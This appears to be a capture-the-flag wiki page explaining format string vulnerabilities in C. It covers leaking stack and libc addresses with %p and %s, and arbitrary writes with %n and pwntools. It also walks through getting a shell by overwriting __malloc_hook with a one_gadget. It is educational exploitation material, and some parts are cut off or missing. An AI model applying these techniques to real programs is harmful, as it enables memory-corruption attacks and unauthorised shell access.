Format String Bug

Abusinng format string specifiers to leak and write addresses

TLDR

Requirements

Use of printf that is directly passed user-supplied input

What can you do with this?

Arbitrary Read - use %p format specifiers to leak pointers on the stack, potentially revealing interesting information (E.g libc addresses, variables)

Arbitrary Write - determine what pointers you want to override on the stack and utilize the %n format specifier to do so

Arbitrary Read

Identifying this vulnerablity is relatively straightforward, we aim to find user-supplied input that is directly passed into printf.

The example below is from DownUnderCTF2020 and will be the main challenge we are referencing throughout this page.

#include <stdio.h>
#define INPUT_SIZE  64
#define INPUT_TIMES  3

__attribute__((constructor))
void setup() {
    setvbuf(stdout, 0, 2, 0);
    setvbuf(stdin, 0, 2, 0);
}

int main() {
    char buffer[INPUT_SIZE];
    int i;

    for (i = 0; i < INPUT_TIMES; i++) {
        fgets(buffer, INPUT_SIZE, stdin);
        printf(buffer);
    }

    return 0;
}

We see that our user input is directly passed into printf and we can verify this by using the format specifier %p which is used to display pointers.

Successful Leak!

To specifically reference a certain offset (E.g Offset 8), we can use the %offset$p to print the specific stack pointer value.

This can be used to leak many useful information for stack exploitation like stack canaries, libc addresses and more.

As you can see above, we are able to leak a libc address 0x7ffff7821b97.

Assuming you know what offset your input is, you could also leak the contents of a arbitrary pointer by specifying the %s. Here is an example from WWCTF.

We have a simple printf vulnerability here and using the %s format specifier, we can dereference arbitrary memory addresses. To get a LIBC leak, we can provide the puts@GOT address, which when dereferenced will give us the actual runtime address of puts in libc.

puts@GOT has been resolved as puts has been called once already in the function

Below is an excerpt of my solve script where was used to leak libc base.

%p also prints till it reads a null byte \x00 so this can be useful when leaking canaries assuming you have control over the buffer that it is printing for. Below is an example.

Arbitrary Write

Printf's %n specifier takes in a pointer and writes the number of characters written so far.

Lets take this program for example.

%n will store the value 10 into the variable c as there where 10 characters printed before %n was called.

So if we have control of the input, we can have a arbitrary write with %n.

This can be further automated with the use of pwntools fmtstr_payload function

Lets see how we can leverage on printf only to obtain a shell.

  1. We perform a stack leak with printf using the %p to list out the value of the pointers on the stack. Since we know that we need a libc-leak, we target the 19th offset using the format %offset$p

  2. Using the libc leak, we are able to get the address of __malloc_hook which will be useful as printf calls malloc

    1. We can then write the address of a one_gadget into &__malloc_hook using pwntools's fmtstr_payload

  3. For our last printf call, we can trigger malloc by passing a large input (E.g passing %65510c) which triggers malloc() which in turn triggers __malloc_hook, calling our one_gadget and giving us a shell

Let's look a example where pwntools cannot save us and we have to do a manual write.

First thought is to just do simple GOT overwrite with a one_gadget but strtol mandates us to have two digit input but less than 58 after a % character, this means that if we use %<no of char>c%offset$hhn, we can only write the range from 10-57.

S

Misc Stuff

  • To determine if the value you leaked is a libc address, just use the address() function in pwndbg and check for rwx with vmmmap

  • printf usually parses the first 1 to 5 offset as parameters so your buffer containing your input should start from offset 6 onwards

  • printf has a internal counter when printing characters which is especially important when chaining multiple %n calls.

    • This means you can do something like this %57c%10$hhnn%57c%10$hhn == %114c%10$hhn

Last updated